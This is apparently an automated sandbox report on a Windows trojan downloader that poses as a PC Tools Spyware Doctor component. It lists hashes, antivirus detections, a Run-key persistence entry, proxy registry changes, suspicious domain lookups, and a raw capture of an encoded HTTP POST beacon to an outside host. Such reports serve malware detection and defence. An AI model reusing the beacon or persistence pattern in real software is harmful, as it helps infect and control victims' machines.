Analysis Date: 2014-12-03 03:21:15
MD5: 14a647a2d43f7236b8667413bef7cc41
SHA1: b312985a912ffd3b39b310255cad615925641fec

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: 5123aa106b5f34c008ec697879ef4f81 sha1: 5fadb264866c2b024b295807ee9edbb87cdac063 size: 12288
Section .rdata md5: c99a74c555371a433d121f551d6c6398 sha1: 605db3fdbaff4ba13729371ad0c4fbab3889378e size: 2048
Section .data md5: b4b5149d15c08aee0c4fcf8dc621d9d2 sha1: b0d09d1c8fb2388cc3541e708740be8b80d2ace3 size: 112128
Section .rsrc md5: 19117b1d314e5905fd7fb899a79f8064 sha1: ae4df4c9e995e73acc8cf9669075ef92c13ce57f size: 5120
Timestamp: 2009-04-19 03:16:21
Version:
LegalCopyright: Copyright © 2010 f PC Tools. All rights reserved. Ij
InternalName: damaz72
FileVersion: 7.0.0.61
CompanyName: PC Tools
LegalTrademarks:
Comments:
ProductName: 6Z lN
ProductVersion: 7.0.0.61
FileDescription: CSpyware Doctor ComponentyF
OriginalFilename: damaz72
PEhash: 72db67a9e99a8e2d2a5b1b01e35b1a7dc8e4b026
IMPhash: 7adbf4fdfef9e936423f9e69b6f564a1
AV 360 Safe: Gen:Heur.IPZ.7
AV Ad-Aware: Gen:Heur.IPZ.7
AV Alwil (avast): MalOb-IJ [Cryp]
AV Arcabit (arcavir): Heur.W32
AV Authentium: W32/FakeAlert.KN.gen!Eldorado
AV Avira (antivir): TR/Kazy.RD
AV BullGuard: Gen:Heur.IPZ.7
AV CA (E-Trust Ino): Win32/Renos.D!generic
AV CAT (quickheal): Trojan.Renos.LN
AV ClamAV: no_virus
AV Dr. Web: Trojan.DownLoader2.37329
AV Emsisoft: Gen:Heur.IPZ.7
AV Eset (nod32): Win32/Kryptik.AEUK
AV Fortinet: W32/Krypt.QKV!tr
AV Frisk (f-prot): W32/FakeAlert.KN.gen!Eldorado
AV F-Secure: Gen:Heur.IPZ.7
AV Grisoft (avg): Win32/Cryptor
AV Ikarus: Trojan-Downloader.SuspectCRC
AV K7: Trojan ( 002456451 )
AV Kaspersky: Trojan.Win32.Generic
AV MalwareBytes: Trojan.Downloader
AV Mcafee: Downloader-CEW.ap
AV Microsoft Security Essentials: TrojanDownloader:Win32/Renos.LX
AV MicroWorld (escan): Gen:Heur.IPZ.7
AV Norman: Gen:Heur.IPZ.7
AV Rising: Trojan.Win32.Generic.1285FA39
AV Sophos: Mal/FakeAV-IZ
AV Symantec: Trojan.FakeAV!gen52
AV Trend Micro: TROJ_RENOS.SMRK
AV VirusBlokAda (vba32): Malware-Cryptor.Limpopo

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates Process: C:\malware.exe
Creates Mutex: Global\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates Mutex: {A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\0ESKOMO9JO ➝
C:\malware.exe
Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\\x03\1601 ➝
NULL
Registry: HKEY_CURRENT_USER\Software\0ESKOMO9JO\OteH ➝
xC7aKZ+O6wyPlq1krRM4sG7m2LFGsYtHjHOagBf10Uk/n4gL8s8xs9LeD5KQVh3/j+XFa0mnr175UElKKyciA2gn6tUEA721Fj4P\\x00
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates File: C:\WINDOWS\Tasks\{22116563-108C-42c0-A7CE-60161B75E508}.job
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: Global\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}
Winsock DNS: lacvictoria.com
Winsock DNS: qqplot.com

Network Details:

DNS: wsj.com
Type: A
205.203.132.65
DNS: wsj.com
Type: A
205.203.140.1
DNS: wsj.com
Type: A
205.203.140.65
DNS: wsj.com
Type: A
205.203.132.1
DNS: fastclick.com
Type: A
64.156.167.84
DNS: nifty.com
Type: A
210.131.4.217
DNS: qqplot.com
Type: A
109.74.195.149
DNS: lacvictoria.com
Type: A
DNS: paulo-fg.com
Type: A
DNS: bonreligion.com
Type: A
HTTP POST: http://qqplot.com/borders.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP: 192.168.1.1:1031 ➝ 109.74.195.149:80

Raw Pcap
0x00000000 (00000)   504f5354 202f626f 72646572 732e7068   POST /borders.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 41636365   p HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000030 (00048)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000040 (00064)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000050 (00080)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x000000a0 (00160)   7171706c 6f742e63 6f6d0d0a 436f6e74   qqplot.com..Cont
0x000000b0 (00176)   656e742d 4c656e67 74683a20 3334310d   ent-Length: 341.
0x000000c0 (00192)   0a436f6e 6e656374 696f6e3a 204b6565   .Connection: Kee
0x000000d0 (00208)   702d416c 6976650d 0a436163 68652d43   p-Alive..Cache-C
0x000000e0 (00224)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x000000f0 (00240)   0d0a0d0a 64617461 3d2f436a 45665a44   ....data=/CjEfZD
0x00000100 (00256)   53767871 43694b30 6c74554d 31757932   SvxqCiK0ltUM1uy2
0x00000110 (00272)   2f797534 55355970 4e6d3176 2f2f6a54   /yu4U5YpNm1v//jT
0x00000120 (00288)   6e675663 2b774d73 2b2b5a42 6a375a53   ngVc+wMs++ZBj7ZS
0x00000130 (00304)   59547233 69426b47 2f672b37 5643432f   YTr3iBkG/g+7VCC/
0x00000140 (00320)   3139682b 314f4870 37655263 48506959   19h+1OHp7eRcHPiY
0x00000150 (00336)   6f393930 4d55756a 67555734 62765449   o990MUujgUW4bvTI
0x00000160 (00352)   644e2f6a 50587547 506a6142 7a786c63   dN/jPXuGPjaBzxlc
0x00000170 (00368)   63356d70 4e303161 36742f51 69535858   c5mpN01a6t/QiSXX
0x00000180 (00384)   77707a39 486d306b 7a396642 6661556e   wpz9Hm0kz9fBfaUn
0x00000190 (00400)   3130782f 474c636f 66526948 344c7646   10x/GLcofRiH4LvF
0x000001a0 (00416)   73416947 59467361 696f4d57 30374b30   sAiGYFsaioMW07K0
0x000001b0 (00432)   4533726b 6b334d65 5a557967 44654c47   E3rkk3MeZUygDeLG
0x000001c0 (00448)   77327331 322b6f50 4d4e726e 4a5a637a   w2s12+oPMNrnJZcz
0x000001d0 (00464)   687a5a38 78694e57 75355467 4f687134   hzZ8xiNWu5TgOhq4
0x000001e0 (00480)   4f715553 30424d54 644b3262 5a792f68   OqUS0BMTdK2bZy/h
0x000001f0 (00496)   7833546e 6d477954 464c4868 4c635266   x3TnmGyTFLHhLcRf
0x00000200 (00512)   2b76417a 494f424e 6d763433 43444b32   +vAzIOBNmv43CDK2
0x00000210 (00528)   51303541 56636d41 38324b68 54665573   Q05AVcmA82KhTfUs
0x00000220 (00544)   732f476f 6c77786c 6d396b4c 6e726e6c   s/Golwxlm9kLnrnl
0x00000230 (00560)   49367034 366e3336 642f3334 6b705656   I6p46n36d/34kpVV
0x00000240 (00576)   32623651 672f413d 3d                  2b6Qg/A==


Strings
._.D
.
..
.
.
p
D.
.

040904E4
 2010 f PC Tools.  All rights reserved. Ij
6Z lN
7.0.0.61
7XPS
aHJkZH
BBABORT
Cannot open file "%s". %s
CklzJ
Comments
CompanyName
Copyright 
CSpyware Doctor ComponentyF
damaz72
DVCLAL
Error reading %s%s%s: %s
Failed to get data for '%s'
FileDescription
FileVersion
InternalName
Invalid argument to date encode
Invalid argument to time encode
Invalid data type for '%s' List capacity out of bounds (%d)
Invalid property element: %s
Invalid property path
Invalid property type: %s
Invalid property value
Invalid stream format$''%s'' is not a valid component name
LegalCopyright
LegalTrademarks
List count out of bounds (%d)
List index out of bounds (%d)+Out of memory while expanding memory stream
MS Sans Serif
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters!'%s' is not a valid integer value('%s' is not a valid floating point value
OriginalFilename
Out of memory
PC Tools
ProductName
ProductVersion
Property is read-only
Property %s does not exist
QkSY
QPBm
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Stream read error
Stream write error
StringFileInfo
TEXTFILEDLG
Translation
VarFileInfo
VS_VERSION_INFO
0d9>\Dh
(0K+8$l
0QBE8d
1My:Ey
1X2ioK
2UPz5bIR
2Yfs0Q
30e(#j`e
32NaxQO
33333333?333333
333333333333333333
3333333333333338
3333339
333338
33333833
333838
3)6{Ik
3e`^iko13\
?3hc(aV
44;xd,
^4]B}c
4g9V<D
^4 .Gl
4pfrivv
4SwuBs
5K;y+A
5(>tqY6
6?Ok9Aq
6XwdAk
6ZEk[\
7Gkpa`Q0V)
7IY1SzUv
7@\S8WB
7&SXhF*
8c-^jH
8JNgDq
8LN#t-<O
8 _\w"4
)[\#9A
9eY%.z-
_9^(u!
_a6LRLJui7PLCT6@16
AbeXf)_
/aCKO)
@ADBqY
#AkkX_
'ao&rXs
_ATD0i@12
_BagV9rrn9
B=)~)c
BM*e:+
bP}P1}
C9^6/u
CreatePopupMenu
CRmkqnpTu
czlybbpjD@4
damaz72
@.data
di"W)|
D'KrGKs
dY|	W0f
Eb3IB9
Edm.vRm
em-ErC
Eo1rmle
e@U\N2eC!
ExitProcess
F039}%r
f9cWMt
F[#r\}\#
/fvY:Z:
&G#3]B
,G9+7654k
GC4b{M
)Gc9j>
GetActiveWindow
GetCapture
GetCurrentThreadId
GetCursor
GetMenu
GetSystemDefaultLangID
GetThreadLocale
GetTickC
GetWindow
GetWindowDC
@GQd4o
gsdV"g
g?;,YWz
	=h">|
;HimgIa
Hshlwapi
/huS3.
I9qqmsc
IDQAOC
IFZyu7
}imX-E
it]C_t
j7fbPKD
"<^Jc8
jX FkX:
JYL!QK
K095]b	
k36r6j
KERNEL32.dll
k<Mwg'4
!L<[,',N
LnXVg{PGx
LoadIconA
LoadLibraryA
/lp@_-x
lstrlenA
m95L[v{
Mo7ul5H
~mSa~C
MSICP60
n1,kF7
~N?F%w
o0k6V{
O4+T.z
oc sBId
od5OUf4
@=OdRd>S>
OHY`2	
Os <R*H:
ow$L	X
Oy"\c1
)p+3h38B
@.P#56
pFi t&VC
ph{7^&
P'RYXz]
-->$.q
(q(2/0@g
q\|%bv
QL^A6:
qOy{%}
r0]||(
`.rdata
:rL]{i
Rr(9K_
s'Bn} 
SetScrollPos
SetScrollRange
'SnIbc
Su\AMO^
SUbHy`>
T44Nr72
t4rWPLn
>t'Fij
This program must be run under Win32
tI9cgWJ0sl
tIwQy_
tM	Lj%Wo
tU[0A|
[T#u9s
tVyCj5
U0MVdlK
UG3Ibf
U%Rj%E
Us3rD1f
user32.dll
'u~sgO
u>v#Kp
uY|31D
VDKpxw
VirtualAlloc
v T5KsX
Vv765eE
We9p]$
$we/pc
W$o][G
X,CJzJ
\	{Xe-
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
x]O!cf
xWT]e7
Y{:CS+
\Y!i\V
Y/Nj$-o
)y_	_v
y^Xu_u@^
ZrB@Y2